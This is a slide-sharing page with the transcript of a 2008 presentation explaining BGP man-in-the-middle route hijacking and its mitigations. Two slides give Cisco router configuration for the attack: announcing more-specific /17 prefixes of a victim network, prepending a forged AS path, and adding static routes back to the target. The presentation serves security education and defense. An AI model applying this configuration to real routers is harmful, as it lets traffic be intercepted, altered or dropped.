jason froehlich december 10 2008
Download
Skip this Video
Download Presentation
BGP Man in the Middle Attack

Loading in 2 Seconds...

play fullscreen
1 / 17

BGP Man in the Middle Attack - PowerPoint PPT Presentation


  • 120 Views
  • Uploaded on

Jason Froehlich December 10, 2008. BGP Man in the Middle Attack. What is BGP?. Routing for whole Internet Autonomous Systems (AS) ‏ Classless Interdomain Routing (CIDR) ‏ 190.100.0.0/16 190.100.0.0, 255.255.0.0. How BGP Works. AS Border Router - “BGP Speaker”

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about ' BGP Man in the Middle Attack' - sasha-hanson


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
what is bgp
What is BGP?
  • Routing for whole Internet
  • Autonomous Systems (AS)‏
  • Classless Interdomain Routing (CIDR)‏
    • 190.100.0.0/16 190.100.0.0, 255.255.0.0
how bgp works
How BGP Works
  • AS Border Router - “BGP Speaker”
    • Advertise own routes, redistribute others
  • Update Messages
    • “AS_PATH” field
  • Path Selection
    • Most “Specific” Network
    • 190.100.0.0/17 over 190.100.0.0/16
the man in the middle attack
The Man in the Middle Attack
  • Requirements:
    • Redirect all traffic to Attacker
    • Forward traffic onto Target
  • Relies on trust built into BGP
attack threats
Attack Threats
  • Confidentiality
    • Capture all packets
  • Integrity
    • Modify packets before delivery
  • Availability
    • Black Hole
    • Filtering selected packets
implementation
Implementation
  • 190.100.0.0/16 (AS100) is Target
  • AS900 is Attacker
implementation step 1
Implementation – Step 1
  • Advertise New Routes
  • More specific
    • 190.100.0.0/17, 190.100.128.0/17
implementation step 11
Implementation – Step 1

router bgp 900

network 190.100.0.0 mask 255.255.128.0

network 190.100.128.0 mask 255.255.128.0

...

neighbor <ip address of AS600 router> remote-as 600

neighbor <ip address of AS700 router> remote-as 700

neighbor <ip address of AS800 router> remote-as 800

no auto-summary

implementation step 2
Implementation – Step 2
  • Create Route Back to Target
  • Modify “AS_PATH” field of advertisement
    • Add each AS in route to target
implementation step 21
Implementation – Step 2

ip prefix-list victim permit 190.100.0.0/16

route-map mitm permit 10

match ip address prefix-list victim

set as-path prepend 600 300 100

ip route 190.100.0.0 255.255.128.0 <ip address of AS600 rtr>

ip route 190.100.128.0 255.255.128.0 <ip address of AS600 rtr>

attack limitations
Attack Limitations
  • Access to BGP Router
    • No script kiddies, but pool still large
  • Half of the Conversation
    • Only sees Inbound traffic
    • Resolve: 2nd BGP MITM, Other MITM (DNS)‏
  • Incomplete Route Distribution
    • AS\'s in Return Path
attack limitations cont
Attack Limitations cont.
  • Packet Route Visible
    • Traceroute
    • Resolve: TTL Modification
  • BGP Updates Visible
    • Alert a perceptive Administrator
  • Encrypted Traffic
    • Cannot decrypt payload
mitigating the attack prevention
Mitigating the Attack - Prevention
  • Filtering
    • Must be done by every ISP
  • Internet Routing Registry
    • Overhead
    • Poor Database Maintenance / Security
mitigating the attack detection
Mitigating the Attack - Detection
  • Monitor for BGP Updates
  • BGPmon.net
mitigating the attack response
Mitigating the Attack - Response
  • Counter-Attack
    • Advertise even more specific networks
  • ISP Disconnect Attacker
    • May take hours to days
    • Youtube.com – February 2008
mitigating the attack securing bgp
Mitigating the Attack – Securing BGP
  • S-BGP
    • 2 Certificates – IP address, AS
  • Secure Origin BGP
    • Topologies
  • Interdomain Route Validation
    • Out of band verification
conclusion
Conclusion

BGP Man in the Middle

  • Powerful Attack
  • Easy to Implement
  • Difficult to Mitigate
ad